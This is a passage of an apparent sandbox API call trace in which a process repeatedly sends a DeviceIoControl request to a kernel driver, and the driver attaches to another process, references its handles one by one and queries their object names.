Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001465720, HandleInformation=0x0) returned 0x0 [0244.105] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.105] PsReleaseProcessExitSynchronization () returned 0x2 [0244.105] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.105] ObQueryNameString (in: Object=0xfffff8a001465720, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.106] ObfDereferenceObject (Object=0xfffff8a001465720) returned 0x1 [0244.106] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.106] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.106] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.106] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.106] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.106] PsAcquireProcessExitSynchronization () returned 0x0 [0244.106] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.106] ObReferenceObjectByHandle (in: Handle=0x2e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00146ba30, HandleInformation=0x0) returned 0x0 [0244.106] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.106] PsReleaseProcessExitSynchronization () returned 0x2 [0244.106] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.106] ObQueryNameString (in: Object=0xfffff8a00146ba30, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.106] ObfDereferenceObject (Object=0xfffff8a00146ba30) returned 0x1 [0244.106] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.106] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.106] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.106] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.106] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.106] PsAcquireProcessExitSynchronization () returned 0x0 [0244.106] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.106] ObReferenceObjectByHandle (in: Handle=0x2e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001497fc0, HandleInformation=0x0) returned 0x0 [0244.106] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.106] PsReleaseProcessExitSynchronization () returned 0x2 [0244.106] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.106] ObQueryNameString (in: Object=0xfffff8a001497fc0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.106] ObfDereferenceObject (Object=0xfffff8a001497fc0) returned 0x1 [0244.106] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.107] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.107] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.107] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.107] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.107] PsAcquireProcessExitSynchronization () returned 0x0 [0244.107] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.107] ObReferenceObjectByHandle (in: Handle=0x2e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0013f87f0, HandleInformation=0x0) returned 0x0 [0244.107] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.107] PsReleaseProcessExitSynchronization () returned 0x2 [0244.107] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.107] ObQueryNameString (in: Object=0xfffff8a0013f87f0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.107] ObfDereferenceObject (Object=0xfffff8a0013f87f0) returned 0x1 [0244.107] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.107] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.107] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.107] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.107] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.107] PsAcquireProcessExitSynchronization () returned 0x0 [0244.107] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.107] ObReferenceObjectByHandle (in: Handle=0x2ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0013f8d60, HandleInformation=0x0) returned 0x0 [0244.107] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.107] PsReleaseProcessExitSynchronization () returned 0x2 [0244.107] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.107] ObQueryNameString (in: Object=0xfffff8a0013f8d60, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.107] ObfDereferenceObject (Object=0xfffff8a0013f8d60) returned 0x1 [0244.107] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.107] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.107] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.107] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.108] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.108] PsAcquireProcessExitSynchronization () returned 0x0 [0244.108] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.108] ObReferenceObjectByHandle (in: Handle=0x2f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001346780, HandleInformation=0x0) returned 0x0 [0244.108] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.108] PsReleaseProcessExitSynchronization () returned 0x2 [0244.108] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.108] ObQueryNameString (in: Object=0xfffff8a001346780, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.108] ObfDereferenceObject (Object=0xfffff8a001346780) returned 0x1 [0244.108] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.108] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.108] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.108] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.108] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.108] PsAcquireProcessExitSynchronization () returned 0x0 [0244.108] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.108] ObReferenceObjectByHandle (in: Handle=0x2f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010ed060, HandleInformation=0x0) returned 0x0 [0244.108] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.108] PsReleaseProcessExitSynchronization () returned 0x2 [0244.108] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.108] ObQueryNameString (in: Object=0xfffff8a0010ed060, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.108] ObfDereferenceObject (Object=0xfffff8a0010ed060) returned 0x1 [0244.108] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.108] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.108] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.108] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.108] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.108] PsAcquireProcessExitSynchronization () returned 0x0 [0244.109] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.109] ObReferenceObjectByHandle (in: Handle=0x308, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00181abb0, HandleInformation=0x0) returned 0x0 [0244.109] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.109] PsReleaseProcessExitSynchronization () returned 0x2 [0244.109] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.109] ObQueryNameString (in: Object=0xfffff8a00181abb0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.109] ObfDereferenceObject (Object=0xfffff8a00181abb0) returned 0x1 [0244.109] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.109] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.109] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.109] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.109] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.109] PsAcquireProcessExitSynchronization () returned 0x0 [0244.109] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.109] ObReferenceObjectByHandle (in: Handle=0x310, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001581450, HandleInformation=0x0) returned 0x0 [0244.109] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.109] PsReleaseProcessExitSynchronization () returned 0x2 [0244.109] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.109] ObQueryNameString (in: Object=0xfffff8a001581450, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.109] ObfDereferenceObject (Object=0xfffff8a001581450) returned 0x1 [0244.109] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.109] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.109] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.109] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.109] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.109] PsAcquireProcessExitSynchronization () returned 0x0 [0244.109] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.109] ObReferenceObjectByHandle (in: Handle=0x318, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0011f2300, HandleInformation=0x0) returned 0x0 [0244.109] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.109] PsReleaseProcessExitSynchronization () returned 0x2 [0244.110] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.110] ObQueryNameString (in: Object=0xfffff8a0011f2300, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.110] ObfDereferenceObject (Object=0xfffff8a0011f2300) returned 0x1 [0244.110] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.110] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.110] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.110] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.110] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.110] PsAcquireProcessExitSynchronization () returned 0x0 [0244.110] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.110] ObReferenceObjectByHandle (in: Handle=0x320, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b45590, HandleInformation=0x0) returned 0x0 [0244.110] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.110] PsReleaseProcessExitSynchronization () returned 0x2 [0244.110] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.110] ObQueryNameString (in: Object=0xfffff8a000b45590, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.110] ObfDereferenceObject (Object=0xfffff8a000b45590) returned 0x1 [0244.110] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.110] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.110] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.110] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.110] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.110] PsAcquireProcessExitSynchronization () returned 0x0 [0244.110] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.110] ObReferenceObjectByHandle (in: Handle=0x334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0011706f0, HandleInformation=0x0) returned 0x0 [0244.110] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.110] PsReleaseProcessExitSynchronization () returned 0x2 [0244.110] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.110] ObQueryNameString (in: Object=0xfffff8a0011706f0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.110] ObfDereferenceObject (Object=0xfffff8a0011706f0) returned 0x1 [0244.110] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.111] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.111] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.111] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.111] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.111] PsAcquireProcessExitSynchronization () returned 0x0 [0244.111] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.111] ObReferenceObjectByHandle (in: Handle=0x358, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0013ccc10, HandleInformation=0x0) returned 0x0 [0244.111] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.111] PsReleaseProcessExitSynchronization () returned 0x2 [0244.111] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.111] ObQueryNameString (in: Object=0xfffff8a0013ccc10, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.111] ObfDereferenceObject (Object=0xfffff8a0013ccc10) returned 0x1 [0244.111] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.111] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.111] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.111] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.111] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.111] PsAcquireProcessExitSynchronization () returned 0x0 [0244.111] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.111] ObReferenceObjectByHandle (in: Handle=0x368, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0013bd470, HandleInformation=0x0) returned 0x0 [0244.111] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.111] PsReleaseProcessExitSynchronization () returned 0x2 [0244.111] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.111] ObQueryNameString (in: Object=0xfffff8a0013bd470, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.111] ObfDereferenceObject (Object=0xfffff8a0013bd470) returned 0x1 [0244.112] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.112] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.112] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.112] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.112] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.112] PsAcquireProcessExitSynchronization () returned 0x0 [0244.112] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.112] ObReferenceObjectByHandle (in: Handle=0x374, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0015643e0, HandleInformation=0x0) returned 0x0 [0244.112] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.112] PsReleaseProcessExitSynchronization () returned 0x2 [0244.112] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.112] ObQueryNameString (in: Object=0xfffff8a0015643e0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.112] ObfDereferenceObject (Object=0xfffff8a0015643e0) returned 0x1 [0244.112] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.112] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.112] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.112] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.112] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.112] PsAcquireProcessExitSynchronization () returned 0x0 [0244.112] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.112] ObReferenceObjectByHandle (in: Handle=0x384, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017e3e40, HandleInformation=0x0) returned 0x0 [0244.112] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.112] PsReleaseProcessExitSynchronization () returned 0x2 [0244.112] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 